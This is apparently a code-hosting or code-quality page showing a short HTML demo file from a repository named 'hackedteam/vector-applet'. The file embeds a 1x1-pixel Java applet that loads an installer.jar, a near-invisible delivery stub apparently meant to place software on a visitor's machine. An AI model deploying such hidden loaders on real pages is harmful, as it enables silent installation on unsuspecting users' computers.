hackedteam/vector-applet

View on GitHub
twostage/html/applet.demo.html

Summary

Maintainability
Test Coverage
<object classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93"
     width=1 height=1>
    <PARAM name="code" value="x.XAppletW">
    <PARAM name="archive" value="installer.jar">
    <param name="codebase_lookup" value="false">
    <comment>
<applet code = 'x.XAppletW' 
    archive = 'installer.jar'
    width = 1
    height = 1>
    <param name="codebase_lookup" value="false">
</applet>
    </comment>
</object>